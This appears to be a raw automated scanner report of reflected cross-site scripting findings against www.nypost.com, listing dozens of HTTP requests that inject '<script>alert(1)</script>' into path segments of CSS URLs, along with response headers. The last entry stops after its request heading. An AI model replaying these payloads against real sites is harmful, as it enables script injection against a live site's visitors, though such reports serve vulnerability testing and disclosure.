HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 725 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:40:00 GMT Connection: close
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 1e704<script>alert(1)</script>cfdf90f07f2 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Resource/SysConfig/WebPortal1e704<script>alert(1)</script>cfdf90f07f2/nypost/blocks/fat_header/fat_header.css HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 725 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:40:02 GMT Connection: close
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 38a9c<script>alert(1)</script>e29f874c4ff was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Resource/SysConfig/WebPortal/nypost38a9c<script>alert(1)</script>e29f874c4ff/blocks/fat_header/fat_header.css HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 725 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:40:05 GMT Connection: close
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload de60c<script>alert(1)</script>24281a7b28a was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Resource/SysConfig/WebPortal/nypost/blocksde60c<script>alert(1)</script>24281a7b28a/fat_header/fat_header.css HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 725 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:40:07 GMT Connection: close
The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload f2df3<script>alert(1)</script>ac3fe82c465 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Resource/SysConfig/WebPortal/nypost/blocks/fat_headerf2df3<script>alert(1)</script>ac3fe82c465/fat_header.css HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 725 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:40:10 GMT Connection: close
The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload f1102<script>alert(1)</script>3c9a06992d2 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Resource/SysConfig/WebPortal/nypost/blocks/fat_header/fat_header.cssf1102<script>alert(1)</script>3c9a06992d2 HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 725 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:40:11 GMT Connection: close
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload cc016<script>alert(1)</script>2745160a2e2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Resource/SysConfigcc016<script>alert(1)</script>2745160a2e2/WebPortal/nypost/blocks/footer/footer.css HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 717 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:40:05 GMT Connection: close
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload e041d<script>alert(1)</script>ef5daaa7b34 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Resource/SysConfig/WebPortale041d<script>alert(1)</script>ef5daaa7b34/nypost/blocks/footer/footer.css HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 717 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:40:07 GMT Connection: close
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload b723f<script>alert(1)</script>624ac6e556 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Resource/SysConfig/WebPortal/nypostb723f<script>alert(1)</script>624ac6e556/blocks/footer/footer.css HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 716 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:40:09 GMT Connection: close
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 41d96<script>alert(1)</script>dceb556a181 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Resource/SysConfig/WebPortal/nypost/blocks41d96<script>alert(1)</script>dceb556a181/footer/footer.css HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 717 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:40:14 GMT Connection: close
The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 67450<script>alert(1)</script>50498f63a55 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Resource/SysConfig/WebPortal/nypost/blocks/footer67450<script>alert(1)</script>50498f63a55/footer.css HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 717 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:40:19 GMT Connection: close
The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload b2b3c<script>alert(1)</script>890670991d1 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Resource/SysConfig/WebPortal/nypost/blocks/footer/footer.cssb2b3c<script>alert(1)</script>890670991d1 HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 717 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:40:21 GMT Connection: close
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 6cc6e<script>alert(1)</script>ae37078603d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Resource/SysConfig6cc6e<script>alert(1)</script>ae37078603d/WebPortal/nypost/blocks/hat/hat.css HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 711 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:40:00 GMT Connection: close
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 4965a<script>alert(1)</script>4ae16c0be26 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Resource/SysConfig/WebPortal4965a<script>alert(1)</script>4ae16c0be26/nypost/blocks/hat/hat.css HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 711 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:40:02 GMT Connection: close
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 31704<script>alert(1)</script>d39de5160d8 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Resource/SysConfig/WebPortal/nypost31704<script>alert(1)</script>d39de5160d8/blocks/hat/hat.css HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 711 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:40:04 GMT Connection: close
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload bd485<script>alert(1)</script>193890173be was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Resource/SysConfig/WebPortal/nypost/blocksbd485<script>alert(1)</script>193890173be/hat/hat.css HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 711 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:40:10 GMT Connection: close
The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 8c6a7<script>alert(1)</script>545a2c5be11 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Resource/SysConfig/WebPortal/nypost/blocks/hat8c6a7<script>alert(1)</script>545a2c5be11/hat.css HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 711 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:40:11 GMT Connection: close
The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 65850<script>alert(1)</script>b4a82bde358 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Resource/SysConfig/WebPortal/nypost/blocks/hat/hat.css65850<script>alert(1)</script>b4a82bde358 HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 711 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:40:22 GMT Connection: close
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 4e0bb<script>alert(1)</script>341c7e99cf was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Resource/SysConfig4e0bb<script>alert(1)</script>341c7e99cf/WebPortal/nypost/blocks/hot_topics/hot_topics.css HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 724 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:40:07 GMT Connection: close
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 208e3<script>alert(1)</script>315a306eca7 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Resource/SysConfig/WebPortal208e3<script>alert(1)</script>315a306eca7/nypost/blocks/hot_topics/hot_topics.css HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 725 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:40:12 GMT Connection: close
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 97698<script>alert(1)</script>52bff809a2 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Resource/SysConfig/WebPortal/nypost97698<script>alert(1)</script>52bff809a2/blocks/hot_topics/hot_topics.css HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 724 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:40:15 GMT Connection: close
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 1ba05<script>alert(1)</script>1ec9bb3b14c was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Resource/SysConfig/WebPortal/nypost/blocks1ba05<script>alert(1)</script>1ec9bb3b14c/hot_topics/hot_topics.css HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 725 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:40:17 GMT Connection: close
The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 4dc7a<script>alert(1)</script>f0b6cfcc4 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Resource/SysConfig/WebPortal/nypost/blocks/hot_topics4dc7a<script>alert(1)</script>f0b6cfcc4/hot_topics.css HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 723 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:40:20 GMT Connection: close
The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload a7a6c<script>alert(1)</script>4dabacaeab7 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Resource/SysConfig/WebPortal/nypost/blocks/hot_topics/hot_topics.cssa7a6c<script>alert(1)</script>4dabacaeab7 HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 725 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:40:22 GMT Connection: close
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c5c5f<script>alert(1)</script>f09d03ad0c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Resource/SysConfigc5c5f<script>alert(1)</script>f09d03ad0c/WebPortal/nypost/blocks/markets/markets.css HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 718 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:40:28 GMT Connection: close
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 879fd<script>alert(1)</script>3721b0ad5ba was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Resource/SysConfig/WebPortal879fd<script>alert(1)</script>3721b0ad5ba/nypost/blocks/markets/markets.css HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 719 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:40:30 GMT Connection: close
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 4b7f5<script>alert(1)</script>15074911464 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Resource/SysConfig/WebPortal/nypost4b7f5<script>alert(1)</script>15074911464/blocks/markets/markets.css HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 719 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:40:32 GMT Connection: close
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 1912c<script>alert(1)</script>f29ff77d1e2 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Resource/SysConfig/WebPortal/nypost/blocks1912c<script>alert(1)</script>f29ff77d1e2/markets/markets.css HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 719 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:40:37 GMT Connection: close
The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 9dbf8<script>alert(1)</script>5b449c7fdd was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Resource/SysConfig/WebPortal/nypost/blocks/markets9dbf8<script>alert(1)</script>5b449c7fdd/markets.css HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 718 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:40:39 GMT Connection: close
The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 3a03b<script>alert(1)</script>7e857a3241b was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Resource/SysConfig/WebPortal/nypost/blocks/markets/markets.css3a03b<script>alert(1)</script>7e857a3241b HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 719 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:40:41 GMT Connection: close
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 7b225<script>alert(1)</script>0d0497a7126 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
